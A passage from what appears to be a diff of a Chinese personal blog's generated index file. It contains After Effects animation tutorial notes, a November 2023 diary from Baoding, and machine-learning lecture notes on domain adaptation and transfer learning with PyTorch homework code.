      • 预览动画效果,调整细节。

    【07-AE实战课】- AE线性动画和非线性动画基础概念

    png

    ​ 可以给物体打开运动模糊。

    ​ 按 F9 给关键帧动画增加缓动效果,曲线编辑器中可以调整位置曲线与速度曲线。

    ​ 高中物理告诉我们,速度是位移对时间求导。


    本章小结
    • 缓动动画(快捷键 - F9

      自然界中的物体从起点移动到终点时,速度从来不是一成不变的。汽车启动时速度会由慢变快,停止时则由快变慢,篮球落地时会在地上来回反弹,并逐渐停止运动。大家都期待事物的呈现遵循一定的运动规律,要制作出更加自然的动画,就需要理解什么是缓动函数。简单来说,缓动函数用于控制动画从初始值运动到最终值的速率。所以,在制作动画时适当的使用缓动函数能让观众得到更舒适的视觉体验。先使用 F9 将选中的关键帧变为平滑帧,点击图表编辑器图标,在图表编辑器面板中单击右键选择编辑速度图标即可调整运动的快慢。

    • 运动模糊

      打开了运动模糊标签开关后,快速运动的物体会产生一定的模糊效果在图层开关栏中打开运动模糊开关,在时间线面板中打开运动模糊总开关,即可看到效果。

    ##【08-AE 实战课】- AE 日夜交替 UI 风动画制作

    png

    ​ 导入白天和夜晚两个合成,再将这俩结合成一个合成(相当于文件夹里套文件夹)。

    png

    png

    ​ 给开关移动制作帧动画,文字透明度制作帧动画。

    png

    ​ 新建一个圆,做白天的反模板。

    png

    ​ 修改速度曲线,先快后慢。

    png

    ​ 设置运动模糊。

    png

    ​ 继续修改速度曲线。

    gif

    ​ 最终效果。


    本章小结
    • 导入素材
      • 选取同时有白天和夜晚两种形态的素材。
      • 思考动画效果,整理图层,并以合成的形式导入 AE。
    • 制作动画
      • 给按钮图层制作往复的位移动画。
      • 按照按钮的动画节点,把文字添加相应的不透明度动画。
      • 确保白天和夜晚两个合成内,按钮的动画一致。
      • 在夜晚的合成中,寻找合适的时间点为月亮添加位移动画。
      • 为白天的合成,添加蒙版,通过蒙版的缩放动画,完成日夜交替的效果。
      • 将所有的关键帧调整为平滑帧,调节速度曲线,达到自己想要的效果。
      • 给做了动效的图层打开运动模糊,打开运动模糊的总开关。
      • 预览动画效果,调整细节。

    【09-AE实战课】- AE创意合成海底世界

    png

    ​ 导入视频素材,调整色调,将黑色映射到深蓝。

    png

    ​ 调整曲线。

    ​ 教程给的 Trapcode 和 Universe 插件太老了,自己上网再整一个吧。

    png

    ​ 设置水色光(浅绿色),继续调整曲线。

    png

    ​ 增加效果 Heatwave 以增加斑驳感。

    png

    ​ 顶层新建一个纯色,添加效果 Optical Flares,整一个耶稣光。

    png

    ​ 混合模式选择 屏幕,把黑色给我删了。

    png

    ​ 调整 Optical Flares 的帧动画:旋转偏移、动画演变。

    png

    ​ 顶层新建一个纯色图层,整一个湍流杂色。

    png

    CC Vector Blur 增加模糊效果。

    ​ 使用叠加效果。

    png

    ​ 多复制几个。

    png

    ​ 如果要多个图层共用一个效果,新建一个调整图层。

    png

    ​ 调整图层里放好效果,放在要应用效果图层的顶端。

    png

    ​ 导入 png 序列。

    png

    ​ 水平翻转。

    png

    ​ 适合复合帮你缩放到合适大小。

    png

    ​ 给水母整一个帧动画。

    png

    CC Particle Systems II,跟 Unity / Blender 里的粒子系统差不多。

    png

    ​ 一阵操作整一个气泡效果。

    png

    ​ 最后再整一个 CC Lens,镜头扭曲。

    gif

    ​ 最终效果。


    本章小结
    • 制作动画
      • 导入“城堡.mp4”素材,新建调整图层。
      • 在调整图层上添加“色调”和“曲线”两个效果,将城堡的整体色调调整为比较暗的蓝色。
      • 在调整图层上添加“Shine”效果,调整光源位置,更改着色模式为水色光。
      • 在调整图层上添加“uni.Heatwave”效果,让海底有一种热浪的感觉,观察整体效果,适当调整色调和曲线。
      • 新建纯色层,添加“OpticalFlares”效果,增加海平面透光的效果,调整光源位置和细节参数。
      • 新建纯色层,添加“湍流杂色”制作水波反射效果,添加“CCVectorBlur”使其更逼真。
      • 复制几层水波纹反射图层,打开水波纹反射图层的三维属性,调整到合适的位置。
      • 新建纯色层,添加“CCParticle System II”效果,修改参数制作海底气泡效果。
      • 添加海底生物素材,使画面更丰富,海底生物的素材应该放在调整图层的下方。
      • 将所有图层预合成,并添加“CCLens”效果,使其有一点变形的感觉。
      • 为视频添加音效和环境音,让整体画面更加和谐。

    ##【10-AE 表达式】- 抖动表达式 Wiggle 的基础用法

    png

    ​ 以 合成 - 保持图层大小,图层选项 可编辑的图层样式

    png

    ​ 将表情打成一个预合成,按 Alt + 左键 点击秒表,调出表达式,选择 Property - wiggle(freq, amp, octaves = 1, amp_mult = 5, t = time)

    png

    1
    wiggle(100, 6)

    ​ 设置 freq=100amp=6

    png

    ​ 将双眼打成一个预合成。

    png

    ​ 给眼睛整一个帧动画。

    png

    F9 改成缓动,修改速度曲线。

    gif

    ​ 最终效果。

    ##【11-AE 表达式】- 循环表达式 loopOut 的基础用法

    png

    ​ 以 合成图层大小 来导入 .ai 文件。

    png

    ​ 将钟摆的锚点挪到最上方。

    png

    1
    loopOut("Cycle")

    ​ 设置三个关键帧动画(左摆-右摆-左摆),设置表达式 loopOut("Cycle")

    ​ 就会得到循环的动画。

    png

    1
    loopOut("PingPong")

    ​ 设置三个关键帧动画(左摆-右摆),设置表达式 loopOut("PingPong")

    ​ 自动帮你把动画再逆序播放一遍,得到跟上版一样的效果。

    gif

    ​ 最终效果。

    ##【12-AE 表达式】- 时间表达式 Time 的基础用法

    png

    ​ 用矩形工具画个斑纹,打成一个预合成。

    png

    ​ 添加 CC Sphere 效果,把分辨率调整成四分之一(这里 AE 容易崩溃)。

    ​ 微调旋转参数。

    png

    ​ 制作上下移动的帧动画。

    png

    ​ 调整曲线,先快后慢。

    png

    1
    time * 360

    ​ 对 CC SphereRotation Y 属性设置表达式 time * 360,它就会 360 度乱转。

    png

    ​ 用椭圆工具建一个阴影,调整缩放的帧动画。

    png

    ​ 调整不透明度的帧动画。

    gif

    ​ 最终效果。

    ##【13-AE 跟踪器】- AE 跟踪器给空间位置捆绑文本

    png

    ​ 新建一个相机。

    png

    ​ 界面变成 3D 的,之后的操作就跟 3D 引擎差不多了。

    png

    ​ 导入一个航拍视频,窗口里调出 跟踪器,点击 跟踪摄像机,电脑就会分析这个视频(光流估计?)生成若干 3D 标记点。

    png

    ​ 随便选一个点,创建文本和摄像机

    png

    ​ 此时就会创建一个文本的 3D 对象,操作它。

    png

    ​ 也可以选择三个点创建文本。

    png

    ​ 操作它。

    png

    ​ 给文本复制一个,添加描边并稍微向后移动一点距离,做一个 3D 文字阴影效果。

    gif

    ​ 最终效果。

    ]]>
    @@ -3886,10 +3886,10 @@ Adobe - GenJi - AE + GenJi + @@ -3915,10 +3915,10 @@ Adobe - AI - GenJi + AI + @@ -3982,7 +3982,7 @@ /posts/Exercise-%E5%B0%8F%E8%AE%BA%E6%96%87%E7%9B%B8%E5%85%B3/ -
    ]]>
    +
    ]]>
    @@ -4009,7 +4009,7 @@ /posts/Diary-6-%E9%87%91%E7%81%BF%E7%81%BF/ - 前言
            

    jpg

    梧桐与银杏

    ​ 梧桐与银杏变化最大的一集。

    ​ 保定气候播报:

    # y 轴数据(假设为温度和 PM 值)
    y1 = [-5, -3, -1, 1, -4, -4, -4, -1, -1, -2, -9, -7, 3, -7] # 当日最低温
    y2 = [9, 11, 10, 11, 13, 13, 15, 16, 13, 16, 10, 2, -7, 5] # 当日最高温
    y3 = [79, 90, 188, 31, 61, 77, 84, 117, 24, 237, 103, 27, 48, 71] # 当日 PM 值

    png

    正文

    11.13

    ​ 在 ROCK HOME TOWN 玩猛了,脚底都磨出水泡了。

    ​ 日照香炉生紫烟,我在宿舍躺半天。

    11.15

    ​ 组会是牛凡汇报,非常的迅速!

    11.16

    你们南方没有冬天是不完整的。

    ——杰哥

    jpg

    遍地金黄

    ​ 在冀大的银杏树即将落光它的叶子前,记录一下最后的金灿灿吧。

    jpg

    1 x 3

    ​ 1 x 3 的组合图,2023 也快要结束了!

    jpg

    2 x 2

    ​ 2 x 2 的组合图制作起来明显要比 1 x 1 的难度要大得多,因为每张图要契合更多的周围信息。经过一阵拉变形和移花接木,总算是让这张组合图看上去正常了些。

    ​ 4.5 那天拍的视角明显偏了,只好把它放在周围信息较少的左上角,不然看上去太突兀了。

    11.17

    ​ 最牛逼的伟哥发的论文被拒了。想想伟哥一天到晚都在电脑前,连个 CCFC 都中不了,而自己搁这天天吃喝玩乐十分快乐,也别对自己的论文有啥追求了😅。

    寄了
    啥啥啥
    这也太坑了吧
    还得是 Electronic
    太可恶了

    11.18

    ​ 周末两天时间都在审查自己的生成的数据集,2W 多张图片看得我眼睛都绿了。最后边听易中天边审,听了 8 集!

    jpg

    晚霞

    ​ 温馨提示:多出去散步对身心有益😃。

    ​ 东湖公园傍晚的日落。

    11.19

    jpg

    江湖一笑 浪滔滔 红尘尽忘了 俱往矣 何足言道
    主要是时间真的太快了
    去年今日
    还在逃难呢
    好家伙
    我还看到我了
    去年今日伟哥天津网吧包夜
    我睡天津西
    太可恶了
    没事明年这个时候希望已经在福建了

    ​ 去年今日已经润了,今年今日要开始体会在河北从未有过的气候了。

    ​ 这一年来,自己成长了什么呢?

    11.20

    @全体成员 最近天气寒冷,温度变化较大,流感病毒比较厉害,同学们一定做好保暖措施,同时做好防护。如果有同学发烧,及时去医院检查,对症下药,多注意休息,早日恢复健康。🌹🌹🌹

    ​ 要是得了甲流,普通的药物不起作用,需要在医生指导下吃药,一般可能会让吃奥司他韦。

    ​ 辅导员突然在群里说注意防护之类的用词,意识到流感在学校里已经有些普遍了😇。

    11.22

    ​ 周三例行组会,汇报的师兄依然觉得水啊!

    11.23

    ​ 华北地区的流感引起了世卫组织的注意!

    ​ 宿舍的凡哥喜提高烧🥵,感觉自己离寄也不远了。

    11.24

    jpg

    环卫工人:6

    ​ 树叶开始大幅落下。

    11.25

    jpg

    保定迎来了初雪,鉴定为《就这》
    太小了
    跟下雨一样
    笑死
    就这
    有点棉絮的感觉
    啥也不是
    勉强能看
    伟哥于 2023 年 11 月 25 日见到了人生中第一次下雪
    特此留念

    ​ 以为北边会有比较大的雪呢,高高兴兴地跑去北边的公园玩,看了个寂寞。

    jpg

    落光光

    ​ 东湖公园的树叶已经落下,湖面甚至开始结冰。

    jpg

    热得一比 vs 冷得一比

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    ]]>
    + 前言
            

    jpg

    梧桐与银杏

    ​ 梧桐与银杏变化最大的一集。

    ​ 保定气候播报:

    1
    2
    3
    4
    # y 轴数据(假设为温度和 PM 值)
    y1 = [-5, -3, -1, 1, -4, -4, -4, -1, -1, -2, -9, -7, 3, -7] # 当日最低温
    y2 = [9, 11, 10, 11, 13, 13, 15, 16, 13, 16, 10, 2, -7, 5] # 当日最高温
    y3 = [79, 90, 188, 31, 61, 77, 84, 117, 24, 237, 103, 27, 48, 71] # 当日 PM 值

    png

    正文

    11.13

    ​ 在 ROCK HOME TOWN 玩猛了,脚底都磨出水泡了。

    ​ 日照香炉生紫烟,我在宿舍躺半天。

    11.15

    ​ 组会是牛凡汇报,非常的迅速!

    11.16

    你们南方没有冬天是不完整的。

    ——杰哥

    jpg

    遍地金黄

    ​ 在冀大的银杏树即将落光它的叶子前,记录一下最后的金灿灿吧。

    jpg

    1 x 3

    ​ 1 x 3 的组合图,2023 也快要结束了!

    jpg

    2 x 2

    ​ 2 x 2 的组合图制作起来明显要比 1 x 1 的难度要大得多,因为每张图要契合更多的周围信息。经过一阵拉变形和移花接木,总算是让这张组合图看上去正常了些。

    ​ 4.5 那天拍的视角明显偏了,只好把它放在周围信息较少的左上角,不然看上去太突兀了。

    11.17

    ​ 最牛逼的伟哥发的论文被拒了。想想伟哥一天到晚都在电脑前,连个 CCFC 都中不了,而自己搁这天天吃喝玩乐十分快乐,也别对自己的论文有啥追求了😅。

    寄了
    啥啥啥
    这也太坑了吧
    还得是 Electronic
    太可恶了

    11.18

    ​ 周末两天时间都在审查自己的生成的数据集,2W 多张图片看得我眼睛都绿了。最后边听易中天边审,听了 8 集!

    jpg

    晚霞

    ​ 温馨提示:多出去散步对身心有益😃。

    ​ 东湖公园傍晚的日落。

    11.19

    jpg

    江湖一笑 浪滔滔 红尘尽忘了 俱往矣 何足言道
    主要是时间真的太快了
    去年今日
    还在逃难呢
    好家伙
    我还看到我了
    去年今日伟哥天津网吧包夜
    我睡天津西
    太可恶了
    没事明年这个时候希望已经在福建了

    ​ 去年今日已经润了,今年今日要开始体会在河北从未有过的气候了。

    ​ 这一年来,自己成长了什么呢?

    11.20

    @全体成员 最近天气寒冷,温度变化较大,流感病毒比较厉害,同学们一定做好保暖措施,同时做好防护。如果有同学发烧,及时去医院检查,对症下药,多注意休息,早日恢复健康。🌹🌹🌹

    ​ 要是得了甲流,普通的药物不起作用,需要在医生指导下吃药,一般可能会让吃奥司他韦。

    ​ 辅导员突然在群里说注意防护之类的用词,意识到流感在学校里已经有些普遍了😇。

    11.22

    ​ 周三例行组会,汇报的师兄依然觉得水啊!

    11.23

    ​ 华北地区的流感引起了世卫组织的注意!

    ​ 宿舍的凡哥喜提高烧🥵,感觉自己离寄也不远了。

    11.24

    jpg

    环卫工人:6

    ​ 树叶开始大幅落下。

    11.25

    jpg

    保定迎来了初雪,鉴定为《就这》
    太小了
    跟下雨一样
    笑死
    就这
    有点棉絮的感觉
    啥也不是
    勉强能看
    伟哥于 2023 年 11 月 25 日见到了人生中第一次下雪
    特此留念

    ​ 以为北边会有比较大的雪呢,高高兴兴地跑去北边的公园玩,看了个寂寞。

    jpg

    落光光

    ​ 东湖公园的树叶已经落下,湖面甚至开始结冰。

    jpg

    热得一比 vs 冷得一比

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    ]]>
    @@ -4121,7 +4121,7 @@ /posts/ML-%E6%9D%8E%E5%AE%8F%E6%AF%85-Lecture%2011-Adaptation/ - Preparation

    【機器學習 2021】概述領域自適應 (Domain Adaptation)

    png

    Domain shift: 训练集和测试集的分布不同,解决方法:Domain adaptation

    迁移学习:ML Lecture 19: Transfer Learning - YouTube

    png

    Domain Shift 分为三种情况:

    • Training Data 和 Testing Data 分布不同,我们将 Training Data 所在域称为 Source Domain,Testing Data 所在域称为 Target Domain(本节课只考虑这个情形)。
    • Training Data 和 Testing Data 标签分布不同。
    • Training Data 和 Testing Data 标签不同。

    png

    Domain Adaption

    如果我们对 target domain 有一定认识:Little but labeled(数量少但正确标注)

    • ldea: training a model by source data then fine-tune the model by target data

      从 source data 里预训练,再在 target data 上 fine-tune

    • Challenge: only limited target data, so becareful about overfitting

      由于 target data 数量小,小心过拟合的问题

    png

    Domain Adaption 的 Basic Idea:设计一个 Feature Extractor 提取 Source Domain 和 Target Domain 的特征,使提取出的特征具有相同分布。

    png

    将网络分成两个部分:Feature Extactor 和 Label Predictor。

    png

    利用类似 GAN 的思路,设计一个 Domain Classifier 对 Feature Extractor 提取出的特征作二分类,目标 $\theta^*d=\min{\theta_d}L_d$。判断提取出的特征属于 Source Domain 还是 Target Domain。

    Label Predictor $\theta^*p=\min{\theta_p}\min L$ 依旧做类别预测。

    Feature Extractor 既要骗过 Domain Classifier,又要提取出有价值的特征。$\theta^*f=\min{\theta_f}L-L_d$

    png

    最早有关 Domain Adversarial Training 的研究:[1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org)

    png

    假设我们当前样本的类别有两类,那么对于有标签的训练集我们可以明显地划分为两类,那么对于没有标签的测试,我们希望它的分布能够和训练集的分布越接近越好,如右图所示

    png

    那么在这个思路上进行拓展的话,对于我们刚才手写识别的例子,我们输入一张图片得到的是一个向量,其中含有属于每一个分类的概率,那我们希望的是这个测试集的样本离分界线越远越好,那就代表它得到的输出向量要更加集中于某一类的概率,不能够各个分类的可能性都差不多

    png

    对于 Knowledge of target domain:

    png

    关于 Domain Generalization 的研究:

    Training 域大,Testing 域小:Domain Generalization with Adversarial Feature Learning | IEEE Conference Publication | IEEE Xplore

    Training 域小,Testing 域大:[1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org)

    ML Lecture 19-Transfer Learning

    png

    关于迁移学习 Transfer Learning,分为两种情况:

    • Similar domain, different tasks 相似域,不同任务
    • Different domains, same task 不同域,相同任务

    png

    迁移学习的应用:Speech Recognition、Image Recognition、Text Analysis

    png

    类比于研究生与漫画家:

    • 研究生 → 漫画家
    • 导师 → 责编
    • 跑实验 → 画分镜
    • 投稿期刊 → 投稿 jump

    png

    对于 Transfer Learning,根据 Source Data (not directly related to the task) 和 Target Data 的情况,共有如下策略:

    Target Data / Source Datalabelledunlabeled
    labelledFine-tuning 微调
    Multitask Learning 多任务学习
    Self-taught learning 自学习
    icml07-selftaughtlearning.pdf (stanford.edu)
    unlabeledDomain-adversarial training 域对抗训练
    Zero-shot learning 零次学习
    Self-taught Clustering 自学聚类算法
    icml.dvi (machinelearning.org)

    png

    Model Fine-tuning

    • Task description

      • Target data: $(xt,yt)$, 数量少
      • Source data: $(xs,ys)$, 数量多
    • Example: (supervised) speaker adaption

      示例:(监督)speaker 自适应

      • Target data: audio data and its transcriptions of specificuser

        目标数据:特定用户的音频数据及其转录

      • Source data: audio data and transcriptions from many speakers

        来源数据:来自许多 speaker 的音频数据和转录

    • ldea: training a model by source data, then fine-tune the model by target data

      ldea:根据源数据训练模型,然后根据目标数据微调模型

      • Challenge: only limited target data, so be careful about overfitting

        挑战:只有有限的目标数据,所以要小心过度拟合

    png

    Conservative Training:

    • 我们先通过 Source data 去 train 一个 model
    • 然后通过并不是直接把这个 model 当做 pre-trained 的 model,去用少量的 target data 去训练一个新的 model
    • 而是加入一些正则化项,来保证新的 model 和旧的 model 在 input 相同的情况下,得到的 output 尽可能的相近。
    • 为什么要这样做呢?其实原因很简单,如果我们在 train 新的 model 的过程中,并不去加这个正则项(也叫限制项),那么如果我们将 source data 送进新的 model,我们会发现整个 model 彻底坏掉了,他已经不具备原先 model 对于 source data 的表现能力了,这也是在 ML 中经常出现的一个非常重要的问题:灾难性遗忘问题

    png

    Layer Transfer

    • 首先还是和 Conservative Training 一样,通过 Source data 去 train 一个 model
    • 然后将该 model 中某些层的 parameters 直接复制进去新的 model 中
    • 对于新 model 中那些没有得到 parameters 的 layer,我们固定其他层的参数,通过 Source data 对那些没有被 transfer 到 parameter 的 layer 进行训练
    • 最后,如果 target data 的数据量比较充足,那么我们就可以在对整个网络进行 fine-tuning 一下,可以进一步提升模型的性能。

    png

    • 对于 Speech 任务,通常 copy 最后几层

    • 对于 Image 任务,通常 copy 头几层

    png

    关于 Layer Transfer 的研究:

    png

    png

    Multitask Learning

    • 再来回顾下 fine-tuning 的过程,在做 fine-tuning 的时候,我们更加关注的是 model 在 target domain 上做的好不好,至于在 source domain 上做的到底怎么样,哪怕是将 source data 输入进这个新的 model 中,model 都坏掉了,也不要紧。只要这个新的 model 在 target domain 上做的很出色就够了。
    • 而 multitask learning 和 fine-tuning 的过程就不同了,multitask 是说,不仅要求我们的最终 model 在 target domain 上表现的相当出色,而且在 source domain 上同样也要表现的相当出色。

    png

    Multitask Learning 在多语言机器翻译上的研究:Multi-Task Learning for Multiple Language Translation (aclanthology.org)

    png

    png

    Progressive Neural Networks

    • 这篇网络中的方法还是比较新的,首先对于 task 1 来说,我们 train 出一个 model
    • 然后将 task 1 中的第 i 层的输出直接输入进 task 2 中的第 i 层的输出,作为第 i + 1 层的输入。
    • 然后后面如果有 k 个网络,就会应用到前 k-1 个网络的信息。

    png

    对于 Source data 和 Target data 处于不同域:mismatch 时

    png

    Domain-adversarial training: 设计一个 Domain classifier,迫使 feature extractor 提取出相同分布的特征。

    png

    Domain-adversarial training

    • 第一部分绿色的 feature extractor 其实要做的就是提取出 source data 和 target data 的 feature,然后使得最后在做 classification 的时候,通过这些提取出来的 feature,能够得到一个非常好的精确度。他还有尽可能让这些 mismatch 的 data 混在一起,以至于 domain classifier 不能够正确的判断他们是否混在一起。
    • 第二部分蓝色的 label predictor 做的是,能够尽可能大的输出 classification 的精度
    • 第三部分红色的 domain classifier 做的是,能够尽可能的将从 feature extractor 中提取出来的 feature 进行分开,将其各自归属到其所属的 domain 里。

    当然,关于这个网络的 train,讲起来很容易,实际操作起来,肯定会像 GAN 一样,涉及到很多的 trick。

    png

    png

    png

    Zero-shot Learning: Source data 和 Target data 是不同的 tasks.

    png

    png

    png

    在 NLP 领域中比较常见,可以用 word embedding

    png

    png

    png

    有关 Zero-shot Learning 的实验:[1312.5650v3] Zero-Shot Learning by Convex Combination of Semantic Embeddings (arxiv.org)

    png

    png

    png

    Self-taught learning 自学习

    • Learning to extract better representation from the source data (unsupervised approach) 学习从源数据中提取更好的表示(无监督方法)
    • Extracting better representation for target data 为目标数据提取更好的表示

    【機器學習 2022】惡搞自督導式學習模型 BERT 的三個故事

    png

    How versatile are self-supervised models?

    自监督模型的通用性如何?

    png

    • Cross-lingual 跨语言
    • Cross-discipline 跨学科
    • Pre-training with artificial data 使用人工数据进行预训练

    Cross-lingual

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    Cross-discipline

    png

    用 BERT 做 DNA 分类。

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    Pre-training with artificial data 使用人造数据进行预训练 BERT

    png

    png

    hw11_domain_adaptation

    场景和为什么 Domain Adversarial Training

    ​现在,我们有了已标记的源数据和未标记的目标数据,其中源数据可能与目标数据相关。现在,我们希望仅使用源数据训练模型,并在目标数据上对其进行测试。

    ​如果我们这样做,可能会出现什么问题?在学习了异常检测之后,我们现在知道,如果我们使用从未出现在源数据中的异常数据来测试模型,我们训练的模型很可能会导致性能不佳,因为它不熟悉异常数据。

    例如,我们有一个包含 Feature Extractor 和 Classifier 的模型:

    ​当使用源数据训练模型时,特征提取器 将提取有意义的特征,因为它熟悉它的分布。从下图中可以看出,蓝点(即源数据的分布)已经聚集到不同的集群中。因此,Classifier 可以根据这些集群预测标签。

    ​但是,在对目标数据进行测试时,Feature Extractor 将无法提取遵循源特征分布的有意义的特征,这会导致为源域学习的分类器无法应用于目标域。

    Nerural 网络的域对抗训练 (DaNN)

    ​基于上述问题,DaNN 方法在源(训练时)和目标(测试时)域之间构建映射,以便为源域学习的分类器在与域之间学习的映射组合时也可以应用于目标域。

    在 DaNN 中,作者添加了一个域分类器,这是训练框架中一个深度判别训练的分类器,用于通过特征提取器提取的特征来区分来自不同领域的数据。随着训练的进行,该方法促进了区分源域和目标域的域分类器,以及可以提取对源域上的主要学习任务具有歧视性且对域之间的转换不加区分的特征提取器。

    ​特征提取器的性能可能优于域分类器,因为它的输入是由特征提取器生成的,并且域分类和标签分类的任务并不冲突。

    ​这种方法导致了域不变且位于相同特征分布上的特征的出现。

    数据介绍

    ​我们的任务包含源数据:真实照片和目标数据:手绘涂鸦。

    ​我们将使用照片和标签训练模型,并尝试预测手绘涂鸦的标签是什么。

    ​数据可以在这里下载。下面的代码用于数据下载和可视化。

    ​注意:源数据和目标数据都是平衡数据,您可以使用此信息。

    # Download dataset
    !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.0/real_or_drawing.zip" -O real_or_drawing.zip

    # Download from mirrored dataset link
    # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.1/real_or_drawing.zip" -O real_or_drawing.zip
    # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.2/real_or_drawing.zip" -O real_or_drawing.zip

    # Unzip the files
    !unzip real_or_drawing.zip
    Streaming output truncated to the last 5000 lines.
    inflating: real_or_drawing/train_data/0/106.bmp
    inflating: real_or_drawing/train_data/0/107.bmp
    inflating: real_or_drawing/train_data/0/108.bmp
    inflating: real_or_drawing/train_data/0/109.bmp
    inflating: real_or_drawing/train_data/0/11.bmp
    ...
    import matplotlib.pyplot as plt

    def no_axis_show(img, title='', cmap=None):
    # imshow, and set the interpolation mode to be "nearest"。
    fig = plt.imshow(img, interpolation='nearest', cmap=cmap)
    # do not show the axes in the images.
    fig.axes.get_xaxis().set_visible(False)
    fig.axes.get_yaxis().set_visible(False)
    plt.title(title)

    titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
    plt.figure(figsize=(18, 18))
    for i in range(10):
    plt.subplot(1, 10, i+1)
    fig = no_axis_show(plt.imread(f'real_or_drawing/train_data/{i}/{500*i}.bmp'), title=titles[i])

    png

    plt.figure(figsize=(18, 18))
    for i in range(10):
    plt.subplot(1, 10, i+1)
    fig = no_axis_show(plt.imread(f'real_or_drawing/test_data/0/' + str(i).rjust(5, '0') + '.bmp'))

    png

    特殊领域知识

    ​我们在涂鸦时,通常只画轮廓,因此我们可以对源数据进行边缘检测处理,使其与目标数据更加相似。

    Canny 边缘检测

    ​Canny Edge Detection 的实现如下。 此处不会详细描述该算法。如果您有兴趣,请参考 wiki 或这里

    ​我们只需要两个参数即可使用 CV2 实现 Canny Edge Detection:low_thresholdhigh_threshold

    cv2.Canny(image, low_threshold, high_threshold)

    ​简单地说,当边值超过 high_threshold 时,我们将其确定为边。如果边值仅高于 low_threshold,我们将确定它是否为边。

    ​让我们在源数据上实现它。

    import cv2
    import matplotlib.pyplot as plt
    titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
    plt.figure(figsize=(18, 18))

    original_img = plt.imread(f'real_or_drawing/train_data/0/0.bmp')
    plt.subplot(1, 5, 1)
    no_axis_show(original_img, title='original')

    gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
    plt.subplot(1, 5, 2)
    no_axis_show(gray_img, title='gray scale', cmap='gray')

    gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
    plt.subplot(1, 5, 2)
    no_axis_show(gray_img, title='gray scale', cmap='gray')

    canny_50100 = cv2.Canny(gray_img, 50, 100)
    plt.subplot(1, 5, 3)
    no_axis_show(canny_50100, title='Canny(50, 100)', cmap='gray')

    canny_150200 = cv2.Canny(gray_img, 150, 200)
    plt.subplot(1, 5, 4)
    no_axis_show(canny_150200, title='Canny(150, 200)', cmap='gray')

    canny_250300 = cv2.Canny(gray_img, 250, 300)
    plt.subplot(1, 5, 5)
    no_axis_show(canny_250300, title='Canny(250, 300)', cmap='gray')

    png

    数据处理

    ​数据适用于 。您可以使用 创建数据集。图像增广的详细信息请参考以下代码中的注释。torchvision.ImageFolder torchvision.ImageFolder

    import numpy as np
    import torch # 张量操作
    import torch.nn as nn # 神经网络层
    import torch.nn.functional as F
    from torch.autograd import Function # 自动微分

    import torch.optim as optim # 优化器
    import torchvision.transforms as transforms
    from torchvision.datasets import ImageFolder
    from torch.utils.data import DataLoader

    # source_transform 使用 Canny 算法进行边缘检测,然后应用了一些数据增强操作,如翻转和旋转。
    source_transform = transforms.Compose([
    # Turn RGB to grayscale. (Bacause Canny do not support RGB images.)
    transforms.Grayscale(), # 转换为灰度图
    # cv2 do not support skimage.Image, so we transform it to np.array,
    # and then adopt cv2.Canny algorithm.
    transforms.Lambda(lambda x: cv2.Canny(np.array(x), 170, 300)), # 应用 Canny 边缘检测
    # Transform np.array back to the skimage.Image.
    transforms.ToPILImage(), # 转换为 PIL 图像对象
    # 50% Horizontal Flip. (For Augmentation)
    transforms.RandomHorizontalFlip(), # 50% 概率水平翻转
    # Rotate +- 15 degrees. (For Augmentation), and filled with zero
    # if there's empty pixel after rotation.
    transforms.RandomRotation(15, fill=(0,)), # 旋转 ±15 度,空白像素填充为 0
    # Transform to tensor for model inputs.
    transforms.ToTensor(), # 转换为 PyTorch 张量
    ])

    # target_transform 则不包含边缘检测,而是对图像大小进行了调整(从 28x28 调整到 32x32),以便与训练数据一致。
    target_transform = transforms.Compose([
    # Turn RGB to grayscale.
    transforms.Grayscale(),
    # Resize: size of source data is 32x32, thus we need to
    # enlarge the size of target data from 28x28 to 32x32。
    transforms.Resize((32, 32)), # 调整大小到 32x32
    # 50% Horizontal Flip. (For Augmentation)
    transforms.RandomHorizontalFlip(),
    # Rotate +- 15 degrees. (For Augmentation), and filled with zero
    # if there's empty pixel after rotation.
    transforms.RandomRotation(15, fill=(0,)),
    # Transform to tensor for model inputs.
    transforms.ToTensor(),
    ])

    # ImageFolder 类从指定路径加载图像文件夹中的数据,并将 source_transform 和 target_transform 应用于图像数据。
    source_dataset = ImageFolder('real_or_drawing/train_data', transform=source_transform)
    target_dataset = ImageFolder('real_or_drawing/test_data', transform=target_transform)

    # 这里的 DataLoader 为训练和测试集创建批量加载器,将数据分批次加载到模型中。
    # batch_size=32 表示每个批次包含 32 张图像,shuffle=True 用于随机打乱训练集的顺序,有助于减少过拟合。
    # test_dataloader 用于加载测试数据,shuffle=False 表示测试集的顺序不会被打乱。
    source_dataloader = DataLoader(source_dataset, batch_size=32, shuffle=True)
    target_dataloader = DataLoader(target_dataset, batch_size=32, shuffle=True)
    test_dataloader = DataLoader(target_dataset, batch_size=128, shuffle=False)

    模型

    ​Feature Extractor:经典 VGG 式架构

    ​标签预测器/域分类器:线性模型。

    class FeatureExtractor(nn.Module):

    def __init__(self):
    super(FeatureExtractor, self).__init__()

    # FeatureExtractor 是一个卷积神经网络,用于从输入图像中提取高维特征。该模块包含 5 个卷积层块,每个块包括:
    self.conv = nn.Sequential(
    nn.Conv2d(1, 64, 3, 1, 1), # 一个卷积层(Conv2d)用于提取空间特征;
    nn.BatchNorm2d(64), # 批归一化层(BatchNorm2d),用于稳定训练过程;
    nn.ReLU(), # ReLU 激活函数,使网络具有非线性;
    nn.MaxPool2d(2), # 最大池化层(MaxPool2d),用于下采样和减少特征图的尺寸。

    nn.Conv2d(64, 128, 3, 1, 1),
    nn.BatchNorm2d(128),
    nn.ReLU(),
    nn.MaxPool2d(2),

    nn.Conv2d(128, 256, 3, 1, 1),
    nn.BatchNorm2d(256),
    nn.ReLU(),
